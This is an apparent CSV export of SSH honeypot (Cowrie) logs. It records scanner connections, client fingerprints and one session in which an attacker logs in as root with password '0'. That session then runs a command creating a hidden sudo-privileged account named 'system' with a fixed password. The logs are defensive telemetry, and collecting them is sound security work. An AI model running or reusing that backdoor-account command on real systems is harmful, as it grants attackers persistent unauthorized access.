AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:15.492686Z"",""src_ip"":""192.155.90.118"",""session"":""37d8a9aeed34""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:11:15.915 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.9154794216156006,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:11:15.914357Z"",""src_ip"":""192.155.90.118"",""session"":""37d8a9aeed34""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:27:00.048 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":4.187134504318237,""message"":""Connection lost after 4 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:27:00.047803Z"",""src_ip"":""198.235.24.158"",""session"":""79e745d1bcb3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:53:24.231 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""198.235.24.222"",""src_port"":63840,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""5d352370cf62"",""protocol"":""ssh"",""message"":""New connection: 198.235.24.222:63840 (10.0.0.4:2222) [session: 5d352370cf62]"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:53:24.229773Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:53:24.816 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:53:24.815933Z"",""src_ip"":""198.235.24.222"",""session"":""5d352370cf62""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:53:25.729 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:53:25.726380Z"",""src_ip"":""198.235.24.222"",""session"":""5d352370cf62""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:53:27.333 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.1007533073425293,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:53:27.332365Z"",""src_ip"":""198.235.24.222"",""session"":""5d352370cf62""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.311 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""172.104.11.4"",""src_port"":23880,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9cb4a477537d"",""protocol"":""ssh"",""message"":""New connection: 172.104.11.4:23880 (10.0.0.4:2222) [session: 9cb4a477537d]"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.310437Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.324 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.323528Z"",""src_ip"":""172.104.11.4"",""session"":""9cb4a477537d""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.330 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.324515Z"",""src_ip"":""172.104.11.4"",""session"":""9cb4a477537d""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.349 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.03668951988220215,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.348463Z"",""src_ip"":""172.104.11.4"",""session"":""9cb4a477537d""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.358 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""172.104.11.4"",""src_port"":23890,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""e3b2c81ed31f"",""protocol"":""ssh"",""message"":""New connection: 172.104.11.4:23890 (10.0.0.4:2222) [session: e3b2c81ed31f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.357526Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.359 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.359139Z"",""src_ip"":""172.104.11.4"",""session"":""e3b2c81ed31f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.403 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.374388Z"",""src_ip"":""172.104.11.4"",""session"":""e3b2c81ed31f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.403 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.030223369598388672,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.389039Z"",""src_ip"":""172.104.11.4"",""session"":""e3b2c81ed31f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.403 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""172.104.11.4"",""src_port"":23894,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""fa6c8e879b78"",""protocol"":""ssh"",""message"":""New connection: 172.104.11.4:23894 (10.0.0.4:2222) [session: fa6c8e879b78]"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.398466Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.422 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.421463Z"",""src_ip"":""172.104.11.4"",""session"":""fa6c8e879b78""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.426 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.422655Z"",""src_ip"":""172.104.11.4"",""session"":""fa6c8e879b78""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 12:15:18.477 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.07714271545410156,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T12:15:18.476428Z"",""src_ip"":""172.104.11.4"",""session"":""fa6c8e879b78""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:48.043 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":50306,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1f2ab4c830c8"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:50306 (10.0.0.4:2222) [session: 1f2ab4c830c8]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:48.042399Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:48.445 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:48.443807Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:48.448 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:48.445709Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:50.296 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:50.295510Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.077 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.075444Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.078 PM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 mSmKGGfS) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 mSmKGGfS) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.077248Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.079 PM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 mSmKGGfS"",""message"":""CMD: openssl passwd -1 mSmKGGfS"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.078791Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.080 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 mSmKGGfS"",""message"":""Command not found: openssl passwd -1 mSmKGGfS"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.080135Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.083 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.082468Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.084 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.083913Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.659 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/c4d3f1747467e8af6a94542f8ce85817e0f5b2dfd114e4961a38a163ef8dc721"",""size"":725,""shasum"":""c4d3f1747467e8af6a94542f8ce85817e0f5b2dfd114e4961a38a163ef8dc721"",""duplicate"":false,""duration"":0.5830068588256836,""message"":""Closing TTY Log: var/lib/cowrie/tty/c4d3f1747467e8af6a94542f8ce85817e0f5b2dfd114e4961a38a163ef8dc721 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.658009Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:26:51.660 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.616314649581909,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:26:51.660051Z"",""src_ip"":""183.81.169.238"",""session"":""1f2ab4c830c8""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:57:28.259 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""64.62.197.137"",""src_port"":14425,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""8816a9320164"",""protocol"":""ssh"",""message"":""New connection: 64.62.197.137:14425 (10.0.0.4:2222) [session: 8816a9320164]"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:57:28.258888Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:57:28.264 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:57:28.261321Z"",""src_ip"":""64.62.197.137"",""session"":""8816a9320164""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:57:28.339 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""7216c7c473918b4f83d1139b3c70dbf9"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nist